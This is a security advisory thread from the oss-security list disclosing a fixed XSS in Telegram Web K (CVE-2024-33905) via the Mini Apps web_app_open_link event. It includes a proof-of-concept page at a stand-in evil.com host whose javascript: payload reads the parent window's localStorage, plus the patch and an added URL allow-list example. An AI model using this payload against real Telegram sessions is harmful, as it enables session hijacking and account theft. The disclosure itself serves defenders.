2024-04-28 16:18:06

by Pedro Batista

Subject: [oss-security] Telegram Web app XSS / Session Hijacking 1-click

Hi oss-security,
I would like to share a vulnerability I reported in the Telegram Web
application, which is open source (https://github.com/morethanwords/tweb).
The vulnerability is an XSS that can be exploited to achieve session
hijacking with 1-click using Telegram Mini Apps.

I reported the vulnerability on March 9th, 2024 and Telegram promptly fixed
it on March 11th, 2024.

# Vulnerable version: Telegram WebK 2.0.0 (486) and below
# Fixed version: Telegram WebK 2.0.0 (488)

# Attack Surface
## Telegram Mini Apps
“Telegram Mini Apps are essentially web applications that you can run
directly within the Telegram messenger interface. Mini Apps support
seamless authorization, integrated crypto and fiat payments (via Google Pay
and Apple Pay), tailored push notifications, and more.”

> https://core.telegram.org/bots/webapps
> https://ton.org/mini-apps

It is important to highlight that this feature is heavily used for crypto
payments in the TON Blockchain.

# Static Analysis
A cached version of the vulnerable file can be found here:
- https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js

```
telegramWebView.addMultipleEventsListeners({
  // [...]
  web_app_open_link: ({url: t}) => { window.open(t, "_blank") }
});
```
The vulnerability was triggered with `postMessage` communication by abusing
the event `web_app_open_link`, which allowed a new URL to remain within the
JavaScript context of the parent window by using the `javascript:` scheme as
the XSS payload.

# Weaponized Setup
1. Attacker creates a Bot + Mini App
2. Sets the URL of the Mini App => https://evil.com/homepage.html
3. The exploit will be hosted in the homepage of the attacker’s site
3.1. homepage.html
```
<body onload=exploit()>
<script>
function exploit() {
  window.parent.postMessage(JSON.stringify({
    eventType: 'web_app_open_link',
    eventData: {url: "javascript:alert(JSON.stringify(window.parent.localStorage))"}
  }), '*');
}
</script>
</body>
```

# Telegram Patch Commit
https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts

```
export default function safeWindowOpen(url: string) {
  window.open(url, '_blank', 'noreferrer');
}
```

# Demo
I have published a writeup for this finding which includes the Exploit
Demo, it's available here:

https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90

I recently requested a CVE for this vulnerability as well, looking forward
to updating the thread as soon as it is issued.

Thanks for looking into my report.

Best regards,
Pedro Baptista
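Added example, not Telegram's code and not part of the report: a scheme allow-list for the `web_app_open_link` handler discussed above, which rejects the `javascript:` payload before anything reaches `window.open` and so complements the `noreferrer` window feature used in the patch. The names `sanitizeExternalUrl`, `handleWebAppOpenLink` and the injected `openWindow` callback are chosen here, and the sample messages are constructed.

```javascript
// Added example, not Telegram's code: validate the URL a Mini App sends
// in a web_app_open_link message before the parent window opens it.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns the canonical URL if `raw` is an absolute http(s) URL, else null.
// The WHATWG URL parser lower-cases the scheme and strips tabs/newlines, so
// "JavaScript:" and "\tjavascript:" are rejected just like "javascript:".
function sanitizeExternalUrl(raw) {
  if (typeof raw !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(raw);           // relative or malformed input throws
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Handles one postMessage payload from the Mini App iframe (hypothetical
// handler name). The iframe origin is attacker-chosen by design, so an
// origin check does not help here; the scheme allow-list is the control.
// `openWindow` is injected so the logic runs outside a browser; in the page
// it would be (u) => window.open(u, '_blank', 'noopener,noreferrer').
// Returns the URL that was opened, or null when the message was dropped.
function handleWebAppOpenLink(rawMessage, openWindow) {
  let msg;
  try {
    msg = JSON.parse(rawMessage);
  } catch {
    return null;
  }
  if (!msg || msg.eventType !== 'web_app_open_link' || !msg.eventData) {
    return null;
  }
  const url = sanitizeExternalUrl(msg.eventData.url);
  if (url === null) return null;     // javascript:, data:, blob:, relative ... dropped
  openWindow(url);
  return url;
}

// Constructed sample messages in the shape shown in the report.
const PAYLOAD = JSON.stringify({ eventType: 'web_app_open_link',
  eventData: { url: 'javascript:alert(JSON.stringify(window.parent.localStorage))' } });
const BENIGN = JSON.stringify({ eventType: 'web_app_open_link',
  eventData: { url: 'https://example.com/docs?x=1' } });

// Stand-alone demonstration: the payload is dropped, the benign link is opened.
const opened = [];
console.log(handleWebAppOpenLink(PAYLOAD, (u) => opened.push(u)));  // null
console.log(handleWebAppOpenLink(BENIGN, (u) => opened.push(u)));   // https://example.com/docs?x=1
```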


2024-04-30 10:16:03

by Pedro Batista

Subject: [oss-security] Re: Telegram Web app XSS / Session Hijacking 1-click

CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <[email protected]> wrote:

> Hi oss-security,
> I would like to share a vulnerability I reported in the Telegram Web
> application, which is open source (https://github.com/morethanwords/tweb).
> The vulnerability is an XSS that can be exploited to achieve session
> hijacking with 1-click using Telegram Mini Apps.
>
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
>
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
>
> # Attack Surface
> ## Telegram Mini Apps
> “Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more.”
>
> > https://core.telegram.org/bots/webapps
> > https://ton.org/mini-apps
>
> It is important to highlight that this feature is heavily used for crypto
> payments in the TON Blockchain.
>
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
>
> ```
> telegramWebView.addMultipleEventsListeners({
>   // [...]
>   web_app_open_link: ({url: t}) => { window.open(t, "_blank") }
> });
> ```
> The vulnerability was triggered with `postMessage` communication by
> abusing the event `web_app_open_link`, which allowed a new URL to remain
> within the JavaScript context of the parent window by using the
> `javascript:` scheme as the XSS payload.
>
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker’s site
> 3.1. homepage.html
> ```
> <body onload=exploit()>
> <script>
> function exploit() {
>   window.parent.postMessage(JSON.stringify({
>     eventType: 'web_app_open_link',
>     eventData: {url: "javascript:alert(JSON.stringify(window.parent.localStorage))"}
>   }), '*');
> }
> </script>
> </body>
> ```
>
> # Telegram Patch Commit
>
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>
> ```
> export default function safeWindowOpen(url: string) {
>   window.open(url, '_blank', 'noreferrer');
> }
> ```
>
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo, it's available here:
>
>
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
>
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
>
> Thanks for looking into my report.
>
> Best regards,
> Pedro Baptista
>